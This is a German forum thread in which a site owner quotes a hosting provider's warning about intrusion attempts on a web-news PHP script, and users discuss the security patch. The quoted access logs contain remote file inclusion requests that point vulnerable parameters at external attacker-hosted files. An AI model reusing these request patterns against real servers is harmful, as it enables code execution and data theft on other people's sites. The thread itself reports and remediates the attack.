wir registrierten vor kurzem einen Crackversuch auf unseren Servern, der von Ihrer Präsenz ausging. Der Angreifer versuchte, sich durch Sicherheitslücken in den von Ihnen verwendeten Scripten Zugriff zum Server zu verschaffen. Es ist davon auszugehen, dass der Angreifer Zugriff auf Ihre Daten erhalten konnte.

Es handelt sich um das Script "parser.php", welches über den Parameter "WN_BASEDIR" die Ausführung beliebigen Codes erlaubt.

125.162.102.196 - - [27/Mar/2008:05:57:10 +0100] "POST /webnews2/parse/parser.php?WN_BASEDIR=http://www.nixelated.com/site/imag
es/push.txt?? HTTP/1.1" 200 4081 http://www.rpg-shop.com "http://www.rpg-shop.com/webnews2/parse/parser.php?WN_BASEDIR=http://www
.nixelated.com/site/images/push.txt??" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13" "-"

Bitte prüfen Sie die Inhalte Ihrer Präsenz und ändern Sie Ihre Passwörter.

Wir haben das PHP-Feature `allow_url_fopen' für das entsprechende Verzeichnis über eine php.ini deaktiviert. Trotzdem empfehlen wir, das Script zu überarbeiten bzw. auf die aktuellste Version zu aktualisieren.

dagegen gibt es den webnews-sicherheitspatch.

Hab ich gefunden und installiert. Wollte nur den Hinweis geben, nicht das noch mehr Leute betroffen sind.

Und schon wieder diesmal siehts anders aus

Es handelt sich um das Script "rpgnews.php", welches über den Parameter "id" die Ausführung beliebigen Codes erlaubt.

218.38.54.48 - - [03/Apr/2008:17:35:27 +0200] "GET /rpgnews.php?id=1127//coppermine/themes/maze/theme.php?THEME_DIR=http://
http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 200 20673 http://www.rpg-shop.com "-"
"libwww-perl/5.79" "-"

wobei rpgnews.php die Seite ist, in die die NEws eingebunden werden

die den parameter "id" kann man gar keinen beliebigen code ausführen, sondern "nur" SQL-injections ausführen. das sollte aber mit sicherheitspatch unterbunden werden.

Ich hab komplett neu installier und den Patch drüber gespielt. Wer weiss was da war. Ich bin mit Webnews sehr zufrieden.